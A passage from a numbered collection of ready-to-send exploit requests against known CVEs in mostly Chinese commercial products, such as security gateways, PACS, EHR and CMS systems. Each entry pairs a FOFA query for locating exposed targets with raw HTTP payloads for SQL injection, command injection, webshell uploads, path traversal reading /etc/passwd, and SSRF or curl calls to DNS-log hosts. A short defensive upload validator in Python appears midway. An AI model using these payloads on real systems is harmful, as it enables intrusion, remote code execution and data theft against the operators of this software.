Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-T W;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104 / DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected models:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc value above decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt; and the command output is returned in the response.

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Then request the uploaded file:
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

Error-based probe: the escaped quote in contenthistid breaks the query on a vulnerable instance. A time-based payload for the same CVE is listed under item 187.

159. INFINITT (英飞达) PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Then call the uploaded web service:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The traversal only works with the slashes and dots percent-encoded as shown; send the path verbatim rather than letting the client normalize it.

161. Keytop (科拓) smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> element sets the file name (here with a ../ sequence so the file lands in the web root) and <fileFlow> carries the file content, base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the uploaded file:
http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Then request the uploaded file (the remotePath field chooses the storage directory):
http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan / Anxiaoyi (慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Then request the stored file (note that the server-side name differs from the uploaded one):
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

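Items 155, 157, 161, 162, 163 and 164 all exploit the same weakness: the server stores the upload under the client-supplied name (or path) and believes the declared Content-Type. The Python below is an added example written for this page, not code from any of the products listed; it puts the name-as-given behaviour those entries abuse beside a validator that rejects the published payloads. The image-only allowlist, the magic-byte table and the sample uploads are assumptions constructed for the example.

```python
import secrets

# Assumed policy for this example: the upload endpoint only accepts images.
# extension -> (MIME type the client must declare, magic bytes the body must start with)
ALLOWED = {
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif":  ("image/gif",  b"GIF8"),
}
# Server-side script openers; an "image" that contains one is not an image.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")

# Sample uploads constructed from the requests above (filename, declared type, body).
SAMPLES = {
    "lylme_155":    ("test.php", "image/png", b"<?php phpinfo();unlink(__FILE__);?>"),
    "keytop_161":   ("../../../../dizxdell.aspx", "application/octet-stream", b"x"),
    "anxiaoyi_164": ("qaz.aspx", "image/jpeg", b'<%@Page Language="C#"%><%Response.Write("x");%>'),
    "polyglot":     ("shell.php.png", "image/png", b"\x89PNG\r\n\x1a\n<?php system('id');?>"),
    "genuine":      ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + bytes(16)),
}


def vulnerable_store_name(client_filename, declared_type, data):
    """The behaviour the entries above exploit: the client's name becomes the
    storage path and the declared Content-Type is taken at face value."""
    return client_filename


def vet_upload(client_filename, declared_type, data):
    """Return (accepted, detail): detail is the rejection reason or the
    server-chosen storage name. Checks are ordered cheapest first."""
    # 1. The client never chooses a path. Reject rather than strip, so a
    #    traversal attempt shows up in logs instead of being silently "fixed".
    if any(ch in client_filename for ch in ("/", "\\")) or ".." in client_filename:
        return False, "path characters in filename"
    # 2. Allowlist on the final extension only: a.php.png is judged as .png and
    #    then caught by the byte checks below, a.png.php is refused here.
    if "." not in client_filename:
        return False, "no extension"
    ext = client_filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    expected_type, magic = ALLOWED[ext]
    # 3. The declared Content-Type is attacker-controlled (item 155 sends PHP as
    #    image/png); it must agree with the extension, and the bytes with both.
    if declared_type != expected_type:
        return False, f"declared type {declared_type} does not match .{ext}"
    if not data.startswith(magic):
        return False, "body lacks the image magic bytes"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker inside image body"
    # 4. The storage name is chosen by the server; the original name is metadata only.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name, (fn, ctype, body) in SAMPLES.items():
        print(f"{name:13} as-sent={vulnerable_store_name(fn, ctype, body)!r:30} vetted={vet_upload(fn, ctype, body)}")
```

The order of the checks matters less than the fact that none of them is skipped: the polyglot sample passes the extension, the declared type and the magic bytes, and is only stopped by the script-marker scan, which is the case a fix that "just checks the extension" leaves open.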
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

Error-based probe for MSSQL: the CHAR() sequence spells "hello", which a vulnerable backend echoes in a type-conversion error message.

167. Lean value management system (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR (宏景EHR) OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing EHR (宏景EHR) downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

The request reaches /selfservice/lawbase/downlawbase through the ../../ prefix; stacked WAITFOR DELAY adds about five seconds of latency on a vulnerable MSSQL backend.

170. Hongjing EHR (宏景EHR) DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
